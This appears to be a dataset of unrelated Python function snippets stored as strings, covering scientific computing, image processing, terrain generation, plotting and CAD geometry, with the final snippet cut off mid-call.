return\n\n dsize = size/2\n ex = sx+size-1\n ey = sy+size-1\n # lets get math style\n\n\n # SQUARE STEP\n\n A = sx, sy\n B = ex, sy\n C = sx, ey\n D = ex, ey\n E = sx+dsize, sy+dsize\n F = sx, sy + dsize\n G = sx + dsize, sy\n H = ex, sy + dsize\n I = sx + dsize, ey\n\n def RAND(X):\n return random.randint(-strong, strong)\n\n ### for coasts dont disappear\n\n def normalize(add_z, X):\n if self[X] <= 0:\n if add_z > 0:\n add_z = -5\n else:\n if add_z <= 0:\n add_z = 5\n return add_z\n\n # Generate heights\n # E = (A+B+C+D) / 4 + RAND(d)\n # F = (A + C + E + E) / 4 + RAND(d)\n # G = (A + B + E + E) / 4 + RAND(d)\n # H = (B + D + E + E) / 4 + RAND(d)\n # I = (C + D + E + E) / 4 + RANS(d)\n\n ### E\n\n try:\n\n add_z = ((self[A] + self[B] + self[C] + self[D]) / 4) + RAND(E)\n\n except KeyError, e:\n print A, B, C, D, size, dsize, len(self)\n raise e\n\n\n self[E] = normalize(add_z, E)\n\n ### F\n\n add_z = (self[A] + self[C] + self[E] + self[E]) / 4 + RAND(F)\n\n self[F] = normalize(add_z, F)\n\n ### G\n\n add_z = (self[A] + self[B] + self[E] + self[E]) / 4 + RAND(G)\n\n self[G] = normalize(add_z, G)\n\n ### H\n\n add_z = (self[B] + self[D] + self[E] + self[E]) / 4 + RAND(H)\n\n self[H] = normalize(add_z, H)\n\n ### I\n add_z = (self[C] + self[D] + self[E] + self[E]) / 4 + RAND(I)\n\n self[I] = normalize(add_z, I)\n\n\n # DIAMOND STEP\n\n # get coordinates\n # 0 - x, 1 - y\n\n x, y = 0, 1\n\n dx = (G[x] - A[x]) / 2\n dy = (F[y] - A[y]) / 2\n\n J = A[x] + dx, A[y] + dy\n K = G[x] 
+ dx, G[y] + dy\n L = F[x] + dx, F[y] + dy\n M = E[x] + dx, E[y] + dy\n\n N = A[x], A[y] + dy\n O = A[x] + dx, A[y]\n P = G[x], G[y] + dy\n Q = A[x] + dx, F[y]\n\n # Generate Heights\n # J = (A + G + F + E)/4 + RAND(d)\n # K = (G + B + E + H)/4 + RAND(d)\n # L = (F + E + C + I)/4 + RAND(d)\n # M = (E + H + I + D)/4 + RAND(d)\n\n # J\n add_z = ((self[A] + self[G] + self[F] + self[E]) / 4) + RAND(J)\n self[J] = normalize(add_z, J)\n\n # K\n add_z = ((self[G] + self[B] + self[E] + self[H]) / 4) + RAND(K)\n self[K] = normalize(add_z, K)\n\n # L\n add_z = ((self[F] + self[E] + self[C] + self[I]) / 4) + RAND(L)\n self[L] = normalize(add_z, L)\n\n # M\n add_z = ((self[E] + self[H] + self[I] + self[D]) / 4) + RAND(M)\n self[M] = normalize(add_z, M)\n\n # N = (K + A + J + F)/4 + RAND(d)\n # O = (L + A + G + J)/4 + RAND(d)\n # P = (J + G + K + E)/4 + RAND(d)\n # Q = (F + J + E + L)/4 + RAND(d)\n\n # N\n add_z = ((self[K] + self[A] + self[J] + self[F]) / 4) + RAND(N)\n self[N] = normalize(add_z, N)\n\n # O\n add_z = ((self[L] + self[A] + self[G] + self[J]) / 4) + RAND(O)\n self[O] = normalize(add_z, O)\n\n # P\n add_z = ((self[J] + self[G] + self[K] + self[E]) / 4) + RAND(P)\n self[P] = normalize(add_z, P)\n\n # Q\n add_z = ((self[F] + self[J] + self[E] + self[L]) / 4) + RAND(Q)\n self[Q] = normalize(add_z, Q)\n\n # N = (A + J + F)/3 + RAND(d)\n # O = (A + G + J)/3 + RAND(d)\n\n # N\n add_z = ((self[A] + self[J] + self[F]) / 3) + RAND(N)\n self[N] = normalize(add_z, N)\n\n # O\n add_z = ((self[A] + self[G] + self[J]) / 3) + RAND(N)\n self[O] = normalize(add_z, O)\n\n\n ### Start recurse for diamond alg\n square_diamond(A[0], A[1], dsize, strong)\n square_diamond(G[0], G[1], dsize, strong)\n square_diamond(F[0], F[1], dsize, strong)\n square_diamond(E[0], E[1], dsize, strong)\n\n # align\n def align_it(start, strong):\n \"\"\"Deprecated\n \"\"\"\n water = 0\n #map3d = self.copy()\n size = (abs(start)*2) + self.size - strong\n start = start + strong\n coords_map = []\n for x in xrange(start,size):\n for y in xrange(start,size):\n coords_map.append( (x, y) )\n\n random.shuffle(coords_map)\n\n lens = strong * (3.0 ** 2)\n for coord in coords_map:\n average = 0.0\n x, y = coord\n #rounds = self.get_round_xy_land(coord, -strong, False)\n #for r_coord in rounds:\n #average += self[r_coord]\n for x in xrange(-strong, strong+1):\n for y in xrange(-strong, strong+1):\n average += self[x, y]\n\n height = int(round(average / lens))\n #height = int(round(average / float(len(rounds))))\n if self[coord] <= water and height > water:\n height = water\n elif self[coord] > water and height <= water:\n height = water + 1\n\n #print self[coord], '->', height\n\n self[coord] = height\n\n if self.config.add_pre_heights:\n print 'Add heights start'\n add_heights()\n print 'Diamond-Square start'\n for x in xrange(1):\n square_diamond(\n sx = 0,\n sy = 0,\n size = self.size, strong=100)", "def reScaleLandsat(self,img):\n \n\t\tthermalBand = ee.List(['thermal'])\n\t\tthermal = ee.Image(img).select(thermalBand).multiply(10)\n \n\t\totherBands = ee.Image(img).bandNames().removeAll(thermalBand)\n\t\tscaled = ee.Image(img).select(otherBands).divide(0.0001)\n \n\t\timage = ee.Image(scaled.addBands(thermal)).int16()\n \n\t\treturn image.copyProperties(img)", "def phosphorene_4band():\n a = 0.222\n ax = 0.438\n ay = 0.332\n theta = 96.79 * (pi / 180)\n phi = 103.69 * (pi / 180)\n\n lat = pb.Lattice(a1=[ax, 0], a2=[0, ay])\n\n h = a * sin(phi - pi / 2)\n s = 0.5 * ax - a * cos(theta / 2)\n lat.add_sublattices(\n ('A', [-s/2, -ay/2, 
h], 0),\n ('B', [ s/2, -ay/2, 0], 0),\n ('C', [-s/2 + ax/2, 0, 0], 0),\n ('D', [ s/2 + ax/2, 0, h], 0)\n )\n\n lat.register_hopping_energies({\n 't1': -1.22,\n 't2': 3.665,\n 't3': -0.205,\n 't4': -0.105,\n 't5': -0.055\n })\n\n lat.add_hoppings(\n # t1\n ([-1, 0], 'A', 'D', 't1'),\n ([-1, -1], 'A', 'D', 't1'),\n ([ 0, 0], 'B', 'C', 't1'),\n ([ 0, -1], 'B', 'C', 't1'),\n # t2\n ([ 0, 0], 'A', 'B', 't2'),\n ([ 0, 0], 'C', 'D', 't2'),\n # t3\n ([ 0, 0], 'A', 'D', 't3'),\n ([ 0, -1], 'A', 'D', 't3'),\n ([ 1, 1], 'C', 'B', 't3'),\n ([ 1, 0], 'C', 'B', 't3'),\n # t4\n ([ 0, 0], 'A', 'C', 't4'),\n ([ 0, -1], 'A', 'C', 't4'),\n ([-1, 0], 'A', 'C', 't4'),\n ([-1, -1], 'A', 'C', 't4'),\n ([ 0, 0], 'B', 'D', 't4'),\n ([ 0, -1], 'B', 'D', 't4'),\n ([-1, 0], 'B', 'D', 't4'),\n ([-1, -1], 'B', 'D', 't4'),\n # t5\n ([-1, 0], 'A', 'B', 't5'),\n ([-1, 0], 'C', 'D', 't5')\n )\n\n return lat", "def bndy_plasma(self):\n self.ne[0], self.ne[-1] = 1e11, 1e11\n self.ni[0], self.ni[-1] = 1e11, 1e11\n self.nn[0], self.nn[-1] = 1e11, 1e11\n self.Te[0], self.Te[-1] = 0.1, 0.1\n self.Ti[0], self.Ti[-1] = 0.01, 0.01\n # self.coll_em[0], self.coll_em[-1] = 1e5, 1e5\n # self.coll_im[0], self.coll_im[-1] = 1e5, 1e5", "def roof_mwfrs(lenght, width, overhang=1, wall_height=3, roof_height=4):\n h = wall_height + 0.5*roof_height\n area = (lenght + overhang) * (width + overhang)\n area_1 = 0.5*h*width\n area_2 = 0.5*h*width\n area_3 = h*width\n area_4 = area - area_1 -area_2 - area_3\n return area, area_1, area_2, area_3, area_4", "def interpolate_matrix(matrix):", "def AgeCrushPad(self):\n\n\n for i in range(2): # Iterate over both types of crush pads\n for j in range(8, -1, -1): # Go through each slot in reverse order\n\n # If the slot if not currently full, move the previous grade up by one.\n # We must check if it is full to ensure that they stop at the max grade.\n if not self.Crush[i][j] and j > 0:\n self.Crush[i][j] = self.Crush[i][j - 1]\n self.Crush[i][j - 1] = False", "def reshape(self,bottom,top):\n pass", "def approx_forearms(shoulder_pts, biceps_pts, thresh, dst):\n forearm_R = None; forearm_L = None\n\n #############\n # RIGHT ARM # FIXME: This is actually the left arm\n #############\n r_start = biceps_pts[1]\n try:\n ''' Given the equation of a line, y = mx + b, we can find the inclination like so:\n\n -> Slope: m = (y2 - y1) / (x2 - x1)\n -> Angle: theta = tan^-1(slope)\n '''\n r_shoulder = shoulder_pts[1]\n r_slope = (r_start[1] - r_shoulder[1]) / (r_start[0] - r_shoulder[0])\n r_incl = np.arctan(r_slope)\n except TypeError:\n r_incl = 0\n if 1 > abs(r_incl) > 0.01:\n for i in range(210, -90, -1):\n sin = np.sin(i * np.pi / 180); cos = np.cos(i * np.pi / 180)\n try:\n r_end = (int(r_start[0] + (sin * 128)), int(r_start[1] + (cos * 128)))\n except TypeError:\n continue\n try:\n if thresh[r_end[1], r_end[0]] == 255:\n cv2.circle(img=dst, center=r_end, radius=3, color=(0, 0, 255), thickness=8)\n forearm_R = r_end\n break\n except IndexError:\n continue\n else:\n for i in range(0, 180):\n sin = np.sin(i * np.pi / 180); cos = np.cos(i * np.pi / 180)\n try:\n r_end = (int(r_start[0] + (sin * 128)), int(r_start[1] + (cos * 128)))\n except TypeError:\n continue\n try:\n if thresh[r_end[1], r_end[0]] == 255:\n cv2.circle(img=dst, center=r_end, radius=3, color=(0, 0, 255), thickness=8)\n forearm_R = r_end\n break\n except IndexError:\n continue\n ############\n # LEFT ARM #\n ############\n l_start = biceps_pts[0]\n try:\n l_shoulder = shoulder_pts[0]\n l_slope = (l_start[1] - l_shoulder[1]) / (l_start[0] - 
l_shoulder[0])\n l_incl = np.arctan(l_slope)\n except TypeError:\n l_incl = 0\n if 1 > abs(l_incl) > 0.01:\n for i in range(210, 90, -1):\n sin = np.sin(i * np.pi / 180); cos = np.cos(i * np.pi / 180)\n try:\n l_end = (int(l_start[0] + (sin * 128)), int(l_start[1] + (cos * 128)))\n except TypeError:\n continue\n try:\n if thresh[l_end[1], l_end[0]] == 255:\n cv2.circle(img=dst, center=l_end, radius=3, color=(0, 0, 255), thickness=8)\n forearm_L = l_end\n break\n except IndexError:\n continue\n else:\n for i in range(360, 180, -1):\n sin = np.sin(i * np.pi / 180); cos = np.cos(i * np.pi / 180)\n try:\n l_end = (int(l_start[0] + (sin * 128)), int(l_start[1] + (cos * 128)))\n except TypeError:\n continue\n try:\n if thresh[l_end[1], l_end[0]] == 255:\n cv2.circle(img=dst, center=l_end, radius=3, color=(0, 0, 255), thickness=8)\n forearm_L = l_end\n break\n except IndexError:\n continue\n return forearm_L, forearm_R", "def one_transition_spectrum_gauss(self,tr):\n \n \n fa = tr[\"fa\"] # Frequency axis\n HWHH = tr[\"HWHH\"] # Half width at the half hight (maximum)\n dd = tr[\"dd\"] # transition dipole strength\n rr = tr[\"rr\"] # transition dipole strength\n ld = tr[\"ld\"] # linear dichroism strength\n om = tr[\"om\"]+self.rwa # frequency\n \n # LineShape = lambda p, x: (x/(p[1]*np.sqrt(2*m.pi))*np.exp(-0.5*((x-p[0])/p[1])**2))\n # broad = broad/np.sqrt(2*np.log(2))\n sigma = HWHH/numpy.sqrt(2*numpy.log(2))\n \n # x = ta.data\n \n data = (fa.data/(sigma*numpy.sqrt(2*numpy.pi))*numpy.exp(-0.5*((fa.data-om)/sigma)**2))\n data_abs = dd*data\n data_CD = rr*data\n data_LD = ld*data\n \n return data_abs,data_CD, data_LD", "def _propagate_R(self):\n self.R_pad = np.pad(self.R, [(self.P, 0), (0, 0)], 'constant')\n M_R = np.lib.stride_tricks.as_strided(self.R_pad,\n shape=[self.L_h, self.L_h, self.P+1],\n strides=[self.R_pad.strides[0], self.R_pad.strides[1], self.R_pad.strides[0]])\n\n self.half_pie_var = np.dot(M_R, self.rev_A)\n self.half_pie_var_pad = np.pad(self.half_pie_var, [(0, 0), (self.P, 0)], 'constant')\n self.M_half_pie_var_pad = np.lib.stride_tricks.as_strided(self.half_pie_var_pad,\n shape=[self.L_h, self.P+1],\n strides=[self.half_pie_var_pad.strides[0]+self.half_pie_var_pad.strides[1], self.half_pie_var_pad.strides[1]])\n\n self.pie_var = np.dot(self.M_half_pie_var_pad, self.rev_A)", "def make_bwfull(w,minZ,maxZ,ires=1,fixw=False,m=mz0):\n cmds = []\n # coefficients for the amplitudes\n cmds.append(\"A[1,0,1000000]\")\n cmds.append(\"B[1,0,1000000]\")\n cmds.append(\"C[10000.0,0,1000000]\")\n # amplitudes\n cmds.append('m[%s,%s,%s]'%(m,minZ,maxZ))\n cmds.append('g[2.49,0,10]')\n denom = '((x^2-m^2)^2+x^4*g^2/m^2)'\n cmds.append(\"expr::z_rbw('x^2/%s',x,m,g)\"%denom)\n cmds.append(\"expr::z_int('(x^2-m^2)/%s',x,m,g)\"%denom)\n cmds.append(\"expr::z_rad('1/(x^2)',x)\")\n # resolution model\n cmds += resolutions[ires]()\n [w.factory(cmd) for cmd in cmds]\n # any parameter adjustments\n if True:\n w.var('r_m').setConstant(kTRUE) if w.var('r_m') else None\n w.var('rt_m').setConstant(kTRUE) if w.var('rt_m') else None\n w.var('g').setConstant(kTRUE) if w.var('g') and fixw else None\n # sum-of-amplitudes pdf\n lshape = RooRealSumPdf('lshape','lshape',RooArgList(w.function('z_rad'),w.function('z_int'),w.function('z_rbw')),RooArgList(w.var('A'),w.var('B'),w.var('C')))\n getattr(w,'import')(lshape)\n # convolution\n pdf = w.pdf('lshape')\n if w.pdf('res'):\n w.var('x').setBins(10000,'cache')\n cmd = 'FCONV::sum(x,lshape,res)'\n w.factory(cmd)\n pdf = w.pdf('sum')\n return pdf, kFALSE", "def 
F_trans(self):\n rho_H1 = self.edp_par['rho_H1'].value\n Z_H1 = self.edp_par['Z_H1'].value\n sigma_H1 = self.edp_par['sigma_H1'].value\n rho_H2 = self.edp_par['rho_H2'].value\n Z_H2 = self.edp_par['Z_H2'].value\n sigma_H2 = self.edp_par['sigma_H2'].value\n rho_M = self.edp_par['rho_M'].value\n sigma_M = self.edp_par['sigma_M'].value\n psi = self.edp_par['psi'].value \n common_scale = self.edp_par['common_scale'].value\n \n \n # Make sure Z_H2 > Z_H1. If Z_H2 < Z_H1, swap them\n if Z_H1 > Z_H2:\n Z_H1, Z_H2 = Z_H2, Z_H1\n sigma_H1, sigma_H2 = sigma_H2, sigma_H1\n rho_H1, rho_H2 = rho_H2, rho_H1\n \n # Calculate the intermediate variables\n alpha = self.qz*cos(psi) - self.qx*sin(psi)\n Z_CH2 = Z_H1 - sigma_H1\n Z_W = Z_H2 + sigma_H2\n DeltaZ_H = Z_W - Z_CH2\n \n # Calculate the Gaussian part \n FG = -rho_M*sigma_M * exp(-0.5*(alpha*sigma_M)**2)\n FG += 2*rho_H1*sigma_H1 * cos(alpha*Z_H1) * exp(-0.5*(alpha*sigma_H1)**2)\n FG += 2*rho_H2*sigma_H2 * cos(alpha*Z_H2) * exp(-0.5*(alpha*sigma_H2)**2)\n FG *= np.sqrt(2*pi)\n \n # Calculate the strip part\n FS = -2 * sin(alpha*Z_CH2) / alpha\n \n # Calculate the bridging part\n FB = 1 / (alpha + pi/DeltaZ_H)\n FB += 1 / (alpha - pi/DeltaZ_H)\n FB *= sin(alpha*Z_W) + sin(alpha*Z_CH2)\n FB *= 0.5\n FB -= (sin(alpha*Z_W)-sin(alpha*Z_CH2)) / alpha\n \n return common_scale * (FG + FS + FB)", "def F_trans(self):\n rho_H1 = self.edp_par['rho_H1'].value\n Z_H1 = self.edp_par['Z_H1'].value\n sigma_H1 = self.edp_par['sigma_H1'].value\n rho_M = self.edp_par['rho_M'].value\n sigma_M = self.edp_par['sigma_M'].value\n psi = self.edp_par['psi'].value \n common_scale = self.edp_par['common_scale'].value\n \n # Calculate the intermediate variables\n alpha = self.qz*cos(psi) - self.qx*sin(psi)\n Z_CH2 = Z_H1 - sigma_H1\n Z_W = Z_H1 + sigma_H1\n DeltaZ_H = Z_W - Z_CH2\n \n # Calculate the Gaussian part \n FG = -rho_M*sigma_M * exp(-0.5*(alpha*sigma_M)**2)\n FG += 2*rho_H1*sigma_H1 * cos(alpha*Z_H1) * exp(-0.5*(alpha*sigma_H1)**2)\n FG *= np.sqrt(2*pi)\n \n # Calculate the strip part\n FS = -2 * sin(alpha*Z_CH2) / alpha\n \n # Calculate the bridging part\n FB = 1 / (alpha + pi/DeltaZ_H)\n FB += 1 / (alpha - pi/DeltaZ_H)\n FB *= sin(alpha*Z_W) + sin(alpha*Z_CH2)\n FB *= 0.5\n FB -= (sin(alpha*Z_W)-sin(alpha*Z_CH2)) / alpha\n \n return common_scale * (FG + FS + FB)", "def calculate(crushes):\n\n def to_stress(force):\n pin_area = np.pi * (PIN_DIAM / 2) ** 2\n return force / pin_area\n\n def to_strain(delta, length):\n delta, length = abs(delta), abs(length)\n return delta / length # compressive positive\n\n for i, num in enumerate(crushes.index):\n crush = crushes.loc[num, 'Data']\n\n # Tissue thickness\n thickness = abs(contact_position(crush))\n crushes.loc[num, 'Thickness (mm)'] = thickness\n\n # Crush duration\n crushes.loc[num, 'Crush Duration (s)'] = crush_duration(crush)\n\n # Target duration\n delta = target_duration(crush)\n crushes.loc[num, 'Target Duration (s)'] = delta\n\n # Target stress\n target_stress = crush.loc[target_time(crush), 'Stress (MPa)']\n crushes.loc[num, 'Target Stress (MPa)'] = target_stress\n\n # Target strain\n target_strain = crush.loc[target_time(crush), 'Strain']\n crushes.loc[num, 'Target Strain'] = target_strain\n\n # Stiffness at contact\n # Assumed to be minimum\n stiffness = crush['Stiffness (MPa)'].min()\n crushes.loc[num, 'Contact Stiffness (MPa)'] = stiffness\n\n # Stiffness at target\n # Assumed to be maximum\n stiffness = crush['Stiffness (MPa)'].max()\n crushes.loc[num, 'Target Stiffness (MPa)'] = stiffness\n\n # Delta stress 
after target reached\n stress_relaxation = to_stress(target_relaxation(crush))\n crushes.loc[num, 'Relaxation Stress (MPa)'] = stress_relaxation\n\n # Delta strain after target reached\n holding_strain = to_strain(target_movement(crush), thickness)\n crushes.loc[num, 'Holding Strain'] = holding_strain\n\n return crushes", "def make_bispectra(self, bgwindow=4):\n\n bisp = lambda d, ij, jk, ki: d[:,ij] * d[:,jk] * n.conj(d[:,ki]) # bispectrum for pol data\n# bisp = lambda d, ij, jk, ki: n.complex(d[ij] * d[jk] * n.conj(d[ki])) # without pol axis\n\n triples = self.make_triples()\n meanbl = self.data.mean(axis=2).mean(axis=0) # find bls with no zeros in either pol to ignore in triples\n self.triples = triples[n.all(meanbl[triples][:,0] != 0j, axis=1) & n.all(meanbl[triples][:,1] != 0j, axis=1) & n.all(meanbl[triples][:,2] != 0j, axis=1)] # only take triples if both pols are good. may be smaller than set for an individual pol\n\n # set up arrays for bispectrum and for weighting data (ignoring zeros)\n bispectra = n.zeros((len(self.dmarr), len(self.data), len(self.triples)), dtype='complex')\n truearr = n.ones( (self.npol, self.nbl, len(self.chans)))\n falsearr = n.zeros( (self.npol, self.nbl, len(self.chans)))\n\n # iterate over dm trials and integrations\n for d in xrange(len(self.dmarr)):\n twidth = n.round(self.twidths[d])\n dmwidth = int(n.round(n.max(self.dmtrack0[d][0]) - n.min(self.dmtrack0[d][0])))\n\n for i in xrange((bgwindow/2)+twidth, len(self.data)-( (bgwindow/2)+2*twidth+dmwidth )): # dmwidth avoided at end, others are split on front and back side of time iteration\n# for i in xrange((bgwindow/2)+twidth, len(self.data)-( (bgwindow/2)+twidth+dmwidth ), max(1,twidth/2)): # can step by twidth/2, but messes up data products\n diff = self.tracksub(d, i, bgwindow=bgwindow)\n\n if len(n.shape(diff)) == 1: # no track\n continue\n\n# **need to redo for self.flags**\n weightarr = n.where(diff != 0j, truearr, falsearr) # ignore zeros in mean across channels # bit of a hack\n try:\n diffmean = n.average(diff, axis=2, weights=weightarr)\n except ZeroDivisionError:\n diffmean = n.mean(diff, axis=2) # if all zeros, just make mean # bit of a hack\n\n for trip in xrange(len(self.triples)):\n ij, jk, ki = self.triples[trip]\n bispectra[d, i, trip] = bisp(diffmean, ij, jk, ki).mean(axis=0) # Stokes I bispectrum. 
Note we are averaging after forming bispectrum, so not technically a Stokes I bispectrum.\n print 'dedispersed for ', self.dmarr[d]\n self.bispectra = n.ma.masked_array(bispectra, bispectra == 0j)", "def stretch(points, stretches=[1, 1]):\n x = stretches[0] * points[0]\n y = stretches[1] * points[1]\n return [x, y]", "def scaleLandsat(self,img):\n\t\tthermal = img.select(ee.List(['thermal'])).multiply(0.1)\n\t\tscaled = ee.Image(img).select(self.env.divideBands).multiply(ee.Number(0.0001))\n\t\t\n\t\treturn img.select([]).addBands(scaled).addBands(thermal)", "def __create_base_shap_img(self):\n\n self.img = 255 * np.ones([1680, 1680, 3], dtype=np.uint8)\n self.baseline_scale_img = cv2.imread(self.scale_img_dict[\"baseline_scale\"])\n self.baseline_scale_top_left = (100, 800)\n baseline_scale_bottom_right = (\n self.baseline_scale_top_left[0] + self.baseline_scale_img.shape[0],\n self.baseline_scale_top_left[1] + self.baseline_scale_img.shape[1],\n )\n baseline_scale_middle = ((int(700 + self.baseline_scale_img.shape[1] / 2)), 85)\n self.img[\n self.baseline_scale_top_left[0] : baseline_scale_bottom_right[0],\n self.baseline_scale_top_left[1] : baseline_scale_bottom_right[1],\n ] = self.baseline_scale_img\n cv2.putText(\n self.img,\n \"BASELINE SHAP\",\n baseline_scale_middle,\n cv2.FONT_HERSHEY_COMPLEX,\n 1,\n (0, 0, 0),\n 2,\n )\n\n self.small_arrow_img = cv2.imread(self.scale_img_dict[\"small_arrow\"])\n small_arrow_top_left = (\n baseline_scale_bottom_right[0],\n int(\n self.baseline_scale_top_left[1]\n + (self.baseline_scale_img.shape[1] / 100) * (self.shap_baseline_value)\n ),\n )\n small_arrow_bottom_right = (\n small_arrow_top_left[0] + self.small_arrow_img.shape[0],\n small_arrow_top_left[1] + self.small_arrow_img.shape[1],\n )\n self.img[\n small_arrow_top_left[0] : small_arrow_bottom_right[0],\n small_arrow_top_left[1] : small_arrow_bottom_right[1],\n ] = self.small_arrow_img\n\n self.color_bar_img = cv2.imread(self.scale_img_dict[\"color_bar\"])\n\n side_scale_img = cv2.imread(self.scale_img_dict[\"side_scale\"])\n side_scale_top_left = (\n small_arrow_bottom_right[0] + 50,\n self.baseline_scale_top_left[1] - 50,\n )\n self.side_scale_y_tick_cords = [\n (side_scale_top_left[0], side_scale_top_left[1] - 75)\n ]\n for i in range(1, 7):\n self.side_scale_y_tick_cords.append(\n (\n int(side_scale_top_left[0] + (side_scale_img.shape[0] / 4) * i),\n int(side_scale_top_left[1] - 75),\n )\n )\n self.arrow_start = (\n int(small_arrow_top_left[1] + (self.small_arrow_img.shape[1] / 2)),\n side_scale_top_left[0],\n )\n\n for img_cnt, (img_name, img_data) in enumerate(self.category_img_dict.items()):\n icon_img = cv2.resize(\n cv2.imread(img_data[\"icon\"]),\n None,\n fx=1.5,\n fy=1.5,\n interpolation=cv2.INTER_CUBIC,\n )\n icon_top_left = (\n self.side_scale_y_tick_cords[img_cnt][0] - int(icon_img.shape[0] / 2),\n self.side_scale_y_tick_cords[img_cnt][1] - 100,\n )\n icon_bottom_right = (\n icon_top_left[0] + icon_img.shape[0],\n self.side_scale_y_tick_cords[img_cnt][1] + icon_img.shape[1] - 100,\n )\n text_location = (\n int(\n icon_bottom_right[0]\n - (icon_bottom_right[0] - icon_top_left[0])\n + 100\n ),\n int(icon_bottom_right[1] - (icon_bottom_right[1] - icon_top_left[1]))\n - 380,\n )\n cv2.putText(\n self.img,\n str(img_name),\n (text_location[1], text_location[0]),\n cv2.FONT_HERSHEY_COMPLEX,\n 0.75,\n (0, 0, 0),\n 1,\n )\n self.img[\n icon_top_left[0] : icon_bottom_right[0],\n icon_top_left[1] : icon_bottom_right[1],\n ] = icon_img", "def reshape(self, bottom, top):\r\n pass", "def 
gain_standardization(self):\r\n \"\"\"\r\n load all gain factors from any hm stage (gains are identical for all SHM stages)\r\n \"\"\"\r\n gain_factors = []\r\n for i in range(self.number_of_paths):\r\n value = self.data_of_hm_cycle['coupon']['path_data'][0][0][0][i][4][0][0]\r\n gain_factors.append(value)\r\n gain_factors = np.array(gain_factors)\r\n gains_factor_new_dim = gain_factors[np.newaxis, ...]\r\n matrix_gains_2d = np.repeat(gains_factor_new_dim, self.signal_length, axis=0).T\r\n matrix_of_gains = matrix_gains_2d[:, :, np.newaxis]\r\n\r\n \"\"\"\r\n divide all signals by the gain factors such that all gains are standardized to one\r\n \"\"\"\r\n for i in range(self.num_of_hm_stages):\r\n entries = i*self.number_of_paths\r\n hm_cycle_set = self.sensor_data_flattened_[entries : entries + self.number_of_paths]\r\n divided_data = np.divide(hm_cycle_set, matrix_of_gains)\r\n self.sensor_data_flattened_[entries : entries + self.number_of_paths] = divided_data\r\n self.sensor_data_original_shape_[i, :, :, :] = divided_data\r\n\r\n return", "def createEntrances(self):\n\t\tfor x in range(self.width):\n\t\t\tif self.isFloor(x, 1):\n\t\t\t\tself.setFloor(x, 0)\n\t\t\t\tbreak\n\t\tfor x in range(self.width - 1, 0, -1):\n\t\t\tif self.isFloor(x, self.height - 2):\n\t\t\t\tself.setFloor(x, self.height - 1)\n\t\t\t\tbreak", "def weight4width(box_width,platformWidth,stairsLength,stepCount,stepWidth):\n if (platformWidth-stairsLength)<0:\n platformWidth = stairsLength + 50 #platform width must larger than stairs length ,the value is 50\n return platformWidth\n else:return platformWidth", "def explainAreaSmall(self):\n \n #EXPLANATION NO. 1\n #fadeout the non-required areas\n self.play(FadeOut(area_ABC_copy), FadeOut(area_ABD_copy),\n FadeOut(geq_2), FadeOut(geq_1),\n FadeOut(area_ABC), FadeOut(area_ABD))\n \n #expand the required area\n self.play(area_ABE_copy.animate.scale(2).move_to(RIGHT*2))\n\n #surrounding text\n abe_text_1 = always_redraw(\n lambda : MathTex(\"=\", \"\\\\text{Area of } \\\\triangle ABE\").scale(0.8).next_to(area_ABE_copy, RIGHT)\n )\n\n #half base height\n abe_text_2 = always_redraw(\n lambda : MathTex(\"=\", \"\\\\dfrac{1}{2}\", \"\\\\times\", \"\\\\text{base}\", \"\\\\times\", \"\\\\text{height}\").scale(0.8).next_to(area_ABE_copy, RIGHT)\n )\n\n #write texts\n self.play(Write(abe_text_1))\n self.wait()\n self.play(ReplacementTransform(abe_text_1[0], abe_text_2[0]),\n ReplacementTransform(abe_text_1[1:], abe_text_2[1:]))\n self.wait()\n\n #defining braces\n abe_base_brace = always_redraw(\n lambda : Brace(radius_ang, DOWN)\n )\n abe_base_brace_label = always_redraw(\n lambda : MathTex(\"R\\\\cos\\\\theta\").scale(0.6).next_to(abe_base_brace, DOWN)\n )\n abe_height_brace = always_redraw(\n lambda : Brace(radius_ang, LEFT)\n )\n abe_height_brace_label = always_redraw(\n lambda : MathTex(\"R\\\\sin\\\\theta\").scale(0.6).next_to(abe_height_brace, LEFT)\n )\n\n self.play(Write(abe_base_brace), Write(abe_height_brace))\n self.play(Write(abe_base_brace_label), Write(abe_height_brace_label))\n self.wait()\n\n \n #back to editing the equation\n abe_text_3 = always_redraw(\n lambda : MathTex(\"=\", \"\\\\dfrac{1}{2}\", \"\\\\times\", \"R\\\\cos\\\\theta\", \"\\\\times\", \"R\\\\sin\\\\theta\").scale(0.8).next_to(area_ABE_copy, RIGHT)\n )\n\n self.play(ReplacementTransform(abe_text_2[0:], abe_text_3[0:]))\n self.wait(0.5)\n self.play(FadeOut(abe_base_brace), FadeOut(abe_height_brace),\n FadeOut(abe_base_brace_label), FadeOut(abe_height_brace_label))\n \n abe_text_4 = 
always_redraw(\n lambda : MathTex(\"=\", \"\\\\dfrac{1}{2}\", \"\\\\times\", \"\\\\cos x\", \"\\\\times\", \"\\\\sin x\").scale(0.8).next_to(area_ABE_copy, RIGHT)\n )\n self.play(ReplacementTransform(abe_text_3[0:], abe_text_4[0:]))\n\n abe_text_5 = always_redraw(\n lambda : MathTex(\"=\", \"\\\\dfrac{1}{2}\", \"\\\\sin x\", \"\\\\cos x\").scale(0.8).next_to(area_ABE_copy, RIGHT)\n )\n self.play(ReplacementTransform(abe_text_4[0:2], abe_text_5[0:2]),\n ReplacementTransform(abe_text_4[2:], abe_text_5[2:]))\n\n #vgroup for drawing box\n abe_group = VGroup(abe_text_5, area_ABE_copy)\n abe_formula_box = SurroundingRectangle(abe_group, color=PINK)\n\n self.play(Write(abe_formula_box))\n self.wait()\n\n #remove all elements\n self.play(FadeOut(abe_formula_box), FadeOut(abe_text_5), FadeOut(area_ABE_copy), FadeOut(area_ABE))", "def __bcc_top_diagonals(self) -> cq.cq.Workplane:\n # In a cuboid ABCDA1B1C1D1 this is the angle C1AD\n #angle_C1AD = 90 - degrees(acos(2**-.5))\n angle_C1AD = 90 - degrees(acos(0.5))\n angle_CAD = 90 - degrees(acos(sqrt(2/3)))\n pseudo_unit_cell_size = sqrt(2/3)*self.unit_cell_size\n corner_points = np.array(\n [(0, 0),\n (self.bcc_unit_cell_size, 0),\n (self.bcc_unit_cell_size, self.unit_cell_size),\n (0, self.unit_cell_size)]\n )\n result = (\n cq.Workplane(\"XY\")\n .pushPoints(corner_points)\n .eachpointAdaptive(\n create_bcc_diagonal_strut,\n callback_extra_args = [\n {\"unit_cell_size\": 0.5 * pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": - angle_CAD,\n \"angle_y\": angle_C1AD},\n {\"unit_cell_size\": pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": - angle_CAD,\n \"angle_y\": - angle_C1AD},\n 